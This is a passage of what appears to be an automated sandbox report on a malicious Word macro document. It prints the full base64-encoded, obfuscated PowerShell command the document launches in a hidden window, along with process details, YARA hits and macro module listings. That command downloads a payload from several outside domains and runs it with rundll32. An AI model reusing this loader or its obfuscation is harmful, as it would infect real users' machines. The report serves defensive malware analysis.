kAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAGMAJwApACkAKwAoACcAaABlACcAKwAnAHIAawAnACkAKwAnAGEAJwArACcAcwAnACsAKAAnAGgAYwAnACsAJwBoAGEAbgAnACkAKwAoACcAdQAnACsAJwAuAGMAJwApACsAKAAoACcAbwBtACcAKwAnAHEAcQApACgAcwAnACsAJwAyACkAKAAnACsAJwBaADoAcQBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAMgApACcAKwAnACgANABaAEUAOABxACcAKwAnAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKABAAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6AHEAJwArACcAcQApACcAKwAnACgAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzADIAKQAnACsAJwAoAHgAJwApACkAKwAoACcAdQBhAG4AJwArACcAdABoAGkAbgAnACkAKwAoACcAaABzACcAKwAnAGgAbwBwACcAKQArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAcQAnACsAJwApACgAcwAnACsAJwAyACkAKAAnACkAKQArACgAJwBhAGMAJwArACcAdQByAGEALQAnACkAKwAnAG0AZAAnACsAJwB4ACcAKwAoACcALQBzAG4AYwAnACsAJwBrACcAKQArACgAKAAnADAAcQAnACsAJwBxACkAKAAnACkAKQArACgAKAAnAHMAMgApACgAMgBMACcAKwAnAFUANwAnACsAJwB3ACcAKwAnAHEAcQApACgAJwArACcAcwAyACkAKABAACcAKwAnAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6ACcAKQApACsAJwBxACcAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAoAHEAcQApACcAKwAnACgAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAYwAnACkAKQArACgAJwBhACcAKwAnAGwAbAB0AG8AJwApACsAJwByAGUAJwArACcAcAAnACsAKAAoACcAYQBpAHIAJwArACcALgBjACcAKwAnAG8AbQBxAHEAKQAoAHMAJwArACcAMgApACgAYQAnACkAKQArACgAKAAnAHMAcwAnACsAJwBlACcAKwAnAHQAcwBxAHEAKQAnACsAJwAoAHMAMgAnACkAKQArACgAKAAnACkAJwArACcAKAAwADkAJwApACkAKwAoACcAZQByAFoAJwArACcARgBGACcAKQArACcAcQBxACcAKwAoACgAJwApACgAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEAAaAAnACkAKQArACgAJwB0AHQAJwArACcAcAAnACkAKwAoACgAJwA6ACcAKwAnAHEAcQAnACsAJwApACgAcwAyACkAJwArACcAKABxAHEAKQAnACsAJwAoAHMAMgApACgAcwBlACcAKQApACsAKAAnAHIAJwArACcAdgBpAGMAaQBvACcAKwAnAHMAJwApACsAJwAuACcAKwAoACcAcwAnACsAJwBlAG0AJwApACsAKAAnAHAAZQByACcAKwAnAHQAaQAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAJwArACcAcQApACcAKQApACsAKAAnACgAcwAyACcAKwAnACkAJwApACsAKAAoACcAKAB3ACcAKQApACsAKAAoACcAcAAtACcAKwAnAGEAZABtAGkAbgBxAHEAKQAnACsAJwAoAHMAMgAnACsAJwApACgAJwArACcAMgAnACkAKQArACgAKAAnAEkAJwArACcAeQAnACsAJwBaAEUANwBrAHEAcQAnACsAJwApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoAEAAJwApACkAKwAoACcAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwA6ACcAKwAnAHEAcQAnACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAHEAJwApACkAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAnACsAJwAoAGcAaQBhACcAKQApACsAKAAnAHQAbwB0ACcAKwAnADMANgA1ACcAKQArACcALgAnACsAKAAnAGMAbwBtACcAKwAnAHEAJwApACsAKAAoACcAcQApACgAcwAyACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwB3ACcAKwAnAHAALQBjAG8AbgB0AGUAbgAnACsAJwB0ACcAKwAnAHEAcQApACgAcwAyACkAJwApACsAKAAoACcAKAB1ACcAKwAnAHAAJwApACkAKwAnAGwAbwAnACsAJwBhACcAKwAoACgAJwBkACcAKwAnAHMAcQBxACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACgAMgAnACsAJwAwACcAKQApACsAKAAnADIAMAAnACsAJwBxAHEAJwApACsAKAAoACcAKQAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABTAHgAJwArACcAcQBxACcAKwAnACkAKABzADIAKQAoACcAKQApACkAKQAuACIAUgBFAFAAbABgAEEAYABjAEUAIgAoACgAKAAoACgAJwBxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAUABMAGAAaQB0ACIAKAAkAEwAXwBoAHgAcwBpAHUAIAArACAAJABQAGkAaQA4AG8AZQBuACAAKwAgACQATwB3ADQAeABqAGgAYQApADsAJABOADgAZgBoAHQAeAA2AD0AKAAoACcATgAnACsAJwA5ADQAOQAnACkAKwAnAGwAdwAnACsAJwBuACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABnAHMAagBoADgAbgAgAGkAbgAgACQATgB5ADQAbQBuAHYAeAAgAHwAIABTAGAATwByAFQALQBvAGIAYABqAGUAYwBUACAAewBHAGAARQBUAC0AYABSAEEAbgBEAG8AbQB9ACkAewB0AHIAeQB7ACQAWgAxAGYAbQB2AHEAaAAuACIAZABvAFcATgBgAGwAbwBBAGQAYABGAGkATABlACIAKAAkAFAAZwBzAGoAaAA4AG4ALAAgACQAVABwAGQAdQBlADMAMgApADsAJABaADUAcgBqADQAYQB1AD0AKAAnAEgAbwAnACsAKAAnAF8AMAA2AHkAJwArACcAaQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABUAHAAZAB1AGUAMwAyACkALgAiAGwAZQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAzADAANwAwADQAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAVABwAGQAdQBlADMAMgAsACcAIwAxACcALgAiAFQAYABPAFMAdABSAGkAYABOAGcAIgAoACkAOwAkAEgAMABfADQAYgB3ADMAPQAoACgAJwBTACcAKwAnAGQAdgBxACcAKQArACgAJwB3ACcAKwAnADYAOQAnACkAKQA7AGIAcgBlAGEAawA7ACQAVwB5AHEAMQAzAG8AcwA9ACgAJwBTADgAJwArACcAZgB5ACcAKwAoACcAOAB4ACcAKwAnADYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAdQBhAHgAbwBmADkAPQAoACcAUwBlACcAKwAoACcAZAAnACsAJwA5ADAAJwApACsAJwBfAHoAJwApAA==
                                                                                                                        Imagebase:0x7ff7bace0000
                                                                                                                        File size:273920 bytes
                                                                                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: conhost.exe PID: 6284 Parent PID: 6276

                                                                                                                        General

                                                                                                                        Start time:14:26:59
                                                                                                                        Start date:16/03/2021
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: msg.exe PID: 6320 Parent PID: 6276

                                                                                                                        General

                                                                                                                        Start time:14:26:59
                                                                                                                        Start date:16/03/2021
                                                                                                                        Path:C:\Windows\System32\msg.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:msg user /v Word experienced an error trying to open the file.
                                                                                                                        Imagebase:0x7ff7caa60000
                                                                                                                        File size:26112 bytes
                                                                                                                        MD5 hash:EEB395D8DD3C1D6593903BD640687948
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: powershell.exe PID: 6388 Parent PID: 6276

                                                                                                                        General

                                                                                                                        Start time:14:27:00
                                                                                                                        Start date:16/03/2021
                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJwArACcAZABlACcAKQArACgAKAAnAHMAcQAnACsAJwBxACkAKABzADIAKQAoAGMAaQBBACcAKwAnAGoAJwArACcAYwBnACcAKQApACsAKAAoACcAagBxAHEAKQAoAHMAMgApACgAQABoAHQAdABwACcAKwAnADoAcQAnACsAJwBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAMgApACgAcQBxACcAKwAnACkAJwArACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwB0ACcAKwAnAG8AbgBnACcAKwAnAGQAYQBpAGgAYQAnACsAJwBuAG8AaQAuAGMAJwArACcAbwBtAHEAcQApACgAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoADgANAA3ADMANAA2ADMAMgA0ACcAKwAnADIAJwArACcAMwAnACsAJwA0ADIAMwA0AHEAJwApACkAKwAoACgAJwBxACkAKABzADIAJwArACcAKQAnACsAJwAoACcAKwAnAHIAcABuAHYAWABtACcAKQApACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAJwArACcAKABzADIAJwArACcAKQAoAEAAaAB0AHQAcAAnACsAJwA6AHEAcQApACcAKwAnACgAcwAyACkAJwArACcAKABxAHEAJwApACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAGMAJwApACkAKwAoACcAaABlACcAKwAnAHIAawAnACkAKwAnAGEAJwArACcAcwAnACsAKAAnAGgAYwAnACsAJwBoAGEAbgAnACkAKwAoACcAdQAnACsAJwAuAGMAJwApACsAKAAoACcAbwBtACcAKwAnAHEAcQApACgAcwAnACsAJwAyACkAKAAnACsAJwBaADoAcQBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAMgApACcAKwAnACgANABaAEUAOABxACcAKwAnAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKABAAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6AHEAJwArACcAcQApACcAKwAnACgAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzADIAKQAnACsAJwAoAHgAJwApACkAKwAoACcAdQBhAG4AJwArACcAdABoAGkAbgAnACkAKwAoACcAaABzACcAKwAnAGgAbwBwACcAKQArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAcQAnACsAJwApACgAcwAnACsAJwAyACkAKAAnACkAKQArACgAJwBhAGMAJwArACcAdQByAGEALQAnACkAKwAnAG0AZAAnACsAJwB4ACcAKwAoACcALQBzAG4AYwAnACsAJwBrACcAKQArACgAKAAnADAAcQAnACsAJwBxACkAKAAnACkAKQArACgAKAAnAHMAMgApACgAMgBMACcAKwAnAFUANwAnACsAJwB3ACcAKwAnAHEAcQApACgAJwArACcAcwAyACkAKABAACcAKwAnAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6ACcAKQApACsAJwBxACcAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAoAHEAcQApACcAKwAnACgAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAYwAnACkAKQArACgAJwBhACcAKwAnAGwAbAB0AG8AJwApACsAJwByAGUAJwArACcAcAAnACsAKAAoACcAYQBpAHIAJwArACcALgBjACcAKwAnAG8AbQBxAHEAKQAoAHMAJwArACcAMgApACgAYQAnACkAKQArACgAKAAnAHMAcwAnACsAJwBlACcAKwAnAHQAcwBxAHEAKQAnACsAJwAoAHMAMgAnACkAKQArACgAKAAnACkAJwArACcAKAAwADkAJwApACkAKwAoACcAZQByAFoAJwArACcARgBGACcAKQArACcAcQBxACcAKwAoACgAJwApACgAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEAAaAAnACkAKQArACgAJwB0AHQAJwArACcAcAAnACkAKwAoACgAJwA6ACcAKwAnAHEAcQAnACsAJwApACgAcwAyACkAJwArACcAKABxAHEAKQAnACsAJwAoAHMAMgApACgAcwBlACcAKQApACsAKAAnAHIAJwArACcAdgBpAGMAaQBvACcAKwAnAHMAJwApACsAJwAuACcAKwAoACcAcwAnACsAJwBlAG0AJwApACsAKAAnAHAAZQByACcAKwAnAHQAaQAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAJwArACcAcQApACcAKQApACsAKAAnACgAcwAyACcAKwAnACkAJwApACsAKAAoACcAKAB3ACcAKQApACsAKAAoACcAcAAtACcAKwAnAGEAZABtAGkAbgBxAHEAKQAnACsAJwAoAHMAMgAnACsAJwApACgAJwArACcAMgAnACkAKQArACgAKAAnAEkAJwArACcAeQAnACsAJwBaAEUANwBrAHEAcQAnACsAJwApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoAEAAJwApACkAKwAoACcAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwA6ACcAKwAnAHEAcQAnACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAHEAJwApACkAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAnACsAJwAoAGcAaQBhACcAKQApACsAKAAnAHQAbwB0ACcAKwAnADMANgA1ACcAKQArACcALgAnACsAKAAnAGMAbwBtACcAKwAnAHEAJwApACsAKAAoACcAcQApACgAcwAyACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwB3ACcAKwAnAHAALQBjAG8AbgB0AGUAbgAnACsAJwB0ACcAKwAnAHEAcQApACgAcwAyACkAJwApACsAKAAoACcAKAB1ACcAKwAnAHAAJwApACkAKwAnAGwAbwAnACsAJwBhACcAKwAoACgAJwBkACcAKwAnAHMAcQBxACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACgAMgAnACsAJwAwACcAKQApACsAKAAnADIAMAAnACsAJwBxAHEAJwApACsAKAAoACcAKQAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABTAHgAJwArACcAcQBxACcAKwAnACkAKABzADIAKQAoACcAKQApACkAKQAuACIAUgBFAFAAbABgAEEAYABjAEUAIgAoACgAKAAoACgAJwBxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAUABMAGAAaQB0ACIAKAAkAEwAXwBoAHgAcwBpAHUAIAArACAAJABQAGkAaQA4AG8AZQBuACAAKwAgACQATwB3ADQAeABqAGgAYQApADsAJABOADgAZgBoAHQAeAA2AD0AKAAoACcATgAnACsAJwA5ADQAOQAnACkAKwAnAGwAdwAnACsAJwBuACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABnAHMAagBoADgAbgAgAGkAbgAgACQATgB5ADQAbQBuAHYAeAAgAHwAIABTAGAATwByAFQALQBvAGIAYABqAGUAYwBUACAAewBHAGAARQBUAC0AYABSAEEAbgBEAG8AbQB9ACkAewB0AHIAeQB7ACQAWgAxAGYAbQB2AHEAaAAuACIAZABvAFcATgBgAGwAbwBBAGQAYABGAGkATABlACIAKAAkAFAAZwBzAGoAaAA4AG4ALAAgACQAVABwAGQAdQBlADMAMgApADsAJABaADUAcgBqADQAYQB1AD0AKAAnAEgAbwAnACsAKAAnAF8AMAA2AHkAJwArACcAaQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABUAHAAZAB1AGUAMwAyACkALgAiAGwAZQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAzADAANwAwADQAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAVABwAGQAdQBlADMAMgAsACcAIwAxACcALgAiAFQAYABPAFMAdABSAGkAYABOAGcAIgAoACkAOwAkAEgAMABfADQAYgB3ADMAPQAoACgAJwBTACcAKwAnAGQAdgBxACcAKQArACgAJwB3ACcAKwAnADYAOQAnACkAKQA7AGIAcgBlAGEAawA7ACQAVwB5AHEAMQAzAG8AcwA9ACgAJwBTADgAJwArACcAZgB5ACcAKwAoACcAOAB4ACcAKwAnADYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAdQBhAHgAbwBmADkAPQAoACcAUwBlACcAKwAoACcAZAAnACsAJwA5ADAAJwApACsAJwBfAHoAJwApAA==
                                                                                                                        Imagebase:0x7ff6ca5e0000
                                                                                                                        File size:447488 bytes
                                                                                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                        Yara matches:
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.345480292.000001924A410000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.340406464.0000019232AD8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.340509636.0000019232B22000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.341303023.0000019232EE5000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000003.262229379.000001924A61C000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.337081458.00000192305F5000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000003.336047915.000001924A6AB000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.339130346.00000192327E7000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.340312638.0000019232A8D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.339329271.000001923285D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.340170127.0000019232A43000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.340568266.0000019232B5B000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.337304488.0000019231EA0000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.340038608.00000192329F8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.340632134.0000019232B85000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.346005102.000001924A6AB000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000003.335945822.000001924A6BB000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.339894658.00000192329AE000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Disassembly

                                                                                                                        Code Analysis

                                                                                                                        VBA Code

                                                                                                                        Call Graph

                                                                                                                        Graph

                                                                                                                        • Entrypoint
                                                                                                                        • Decryption Function
                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        • Show Help
                                                                                                                        callgraph 38 Document_open 190 Vj_abq1qp3rat9wz Len:1,Create:1,Mid:1,ChrW:1,CreateObject:1 38->190 62 Mrfzpndjp3s0k 974 Y94cd7j9wr9jms 190->974 x 2 974->62

                                                                                                                        Module: Avi6wp3s89lev

                                                                                                                        Declaration
                                                                                                                        LineContent
                                                                                                                        1

                                                                                                                        Attribute VB_Name = "Avi6wp3s89lev"

                                                                                                                        Module: Bj7zc5k612ib

                                                                                                                        Declaration
                                                                                                                        LineContent
                                                                                                                        1

                                                                                                                        Attribute VB_Name = "Bj7zc5k612ib"

                                                                                                                        2

                                                                                                                        Attribute VB_Base = "0{53E03B9E-2218-45B6-85A2-C47D984847B8}{DECDBE84-7493-4018-BC88-15CC72351445}"

                                                                                                                        3

                                                                                                                        Attribute VB_GlobalNameSpace = False

                                                                                                                        4

                                                                                                                        Attribute VB_Creatable = False

                                                                                                                        5

                                                                                                                        Attribute VB_PredeclaredId = True

                                                                                                                        6

                                                                                                                        Attribute VB_Exposed = False

                                                                                                                        7

                                                                                                                        Attribute VB_TemplateDerived = False

                                                                                                                        8

                                                                                                                        Attribute VB_Customizable = False

                                                                                                                        Module: Hiuk_v7ho95scpn0j

                                                                                                                        Declaration
                                                                                                                        LineContent
                                                                                                                        1

                                                                                                                        Attribute VB_Name = "Hiuk_v7ho95scpn0j"

                                                                                                                        2

                                                                                                                        Attribute VB_Base = "0{DCA2A5D6-E131-4DDA-895B-3E9822E93650}{59CEE0E1-26C4-4583-B7FF-9510385F9059}"

                                                                                                                        3

                                                                                                                        Attribute VB_GlobalNameSpace = False

                                                                                                                        4

                                                                                                                        Attribute VB_Creatable = False

                                                                                                                        5

                                                                                                                        Attribute VB_PredeclaredId = True

                                                                                                                        6

                                                                                                                        Attribute VB_Exposed = False

                                                                                                                        7

                                                                                                                        Attribute VB_TemplateDerived = False

                                                                                                                        8

                                                                                                                        Attribute VB_Customizable = False

                                                                                                                        Module: Hvp1hxwgx78q8fg4

                                                                                                                        Declaration
                                                                                                                        LineContent
                                                                                                                        1

                                                                                                                        Attribute VB_Name = "Hvp1hxwgx78q8fg4"

                                                                                                                        2

                                                                                                                        Attribute VB_Base = "0{C2BABB20-D2C4-427C-9EDB-4620FFEE0F8C}{14D3B583-866E-4040-A821-3D821B8C0F73}"

                                                                                                                        3

                                                                                                                        Attribute VB_GlobalNameSpace = False

                                                                                                                        4

                                                                                                                        Attribute VB_Creatable = False

                                                                                                                        5

                                                                                                                        Attribute VB_PredeclaredId = True

                                                                                                                        6

                                                                                                                        Attribute VB_Exposed = False

                                                                                                                        7

                                                                                                                        Attribute VB_TemplateDerived = False

                                                                                                                        8

                                                                                                                        Attribute VB_Customizable = False

